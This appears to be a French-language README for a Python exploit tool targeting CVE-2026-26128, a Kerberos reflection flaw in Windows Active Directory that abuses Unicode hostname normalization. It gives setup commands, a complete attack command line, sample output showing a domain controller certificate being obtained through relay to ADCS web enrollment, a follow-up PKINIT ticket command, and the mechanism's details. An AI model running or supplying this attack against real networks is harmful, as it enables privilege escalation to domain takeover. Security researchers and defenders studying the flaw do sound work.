
Exploite la réflexion Kerberos via la normalisation Unicode dans Windows Active Directory pour relayer l'authentification vers ADCS et MSSQL, permettant une élévation de privilèges basée sur les certificats.

Outil Python pour exploiter la réflexion Kerberos via la normalisation Unicode dans Windows Active Directory. Basé sur les recherches de Guillaume André / Synacktiv.
Ces outils ne sont compatibles qu'avec Python 3.8+. Clonez le dépôt depuis GitHub, installez les dépendances et vous êtes prêt :
git clone https://github.com/jarnovandenbrink/CVE-2026-26128.git
cd CVE-2026-26128
pip install -r requirements.txt
python3 CVE-2026-26128.py contoso.com/john:password -t http://contoso-dc.contoso.com/certsrv/certfnsh.asp -l 192.168.1.80 -dc-ip 192.168.1.10
[*] Connecting to LDAP on 192.168.1.10
[*] LDAP connection established
[*] Adding DNS record: cⓞntoso-dc.contoso.com
[*] Waiting for DNS propagation... 180s
[*] DNS propagation complete
[*] Setting up SMB Server
[*] SMBD: Received connection from 192.168.1.10
[*] HTTP server returned status code 200, treating as a successful login
[*] [+] Attack worked!
[*] Certificate will be written to: /path/to/CONTOSO-DC.pfx
[*] To request a TGT using PKINIT run:
python3 gettgtpkinit.py contoso.com/CONTOSO-DC$ -cert-pfx /path/to/CONTOSO-DC.pfx -dc-ip 192.168.1.10 out.ccache
[*] GOT CERTIFICATE! ID 16
[*] Writing PKCS#12 certificate to ./CONTOSO-DC.pfx
[*] Certificate successfully written to file
Alternativement, cette attaque peut être menée contre l'inscription web ADCS et MSSQL. Notez que pour le relais Kerberos vers MSSQL, le serveur SQL doit s'exécuter avec le compte machine. Sinon, l'AP-REQ ne sera pas déchiffré avec la bonne clé.
Cet outil exploite la façon dont Windows normalise les caractères Unicode lors de la résolution des SPN. Le service DnsCache utilise CompareStringW avec NORM_IGNORECASE, qui traite ⓢⓡⓥ1․ⓐⓓ․ⓛⓞⓒⓐⓛ différemment de srv1.ad.local, ce qui l'amène à émettre une requête DNS. Le contrôleur de domaine, quant à lui, utilise LCMapStringEx avec les indicateurs de normalisation 0x31403. En enregistrant un enregistrement DNS pour le nom d'hôte Unicode et en le pointant vers la machine de l'attaquant, l'AP-REQ peut être relayé vers n'importe quel service qui n'impose pas la liaison de canal ou l'intégrité des communications.
Les cibles de relais prises en charge sont l'inscription web ADCS et MSSQL. La prise en charge du service d'administration SCCM est prévue. Notez que le relais SMB n'est plus possible sur les systèmes corrigés avec la mise à jour du Patch Tuesday de mars 2026.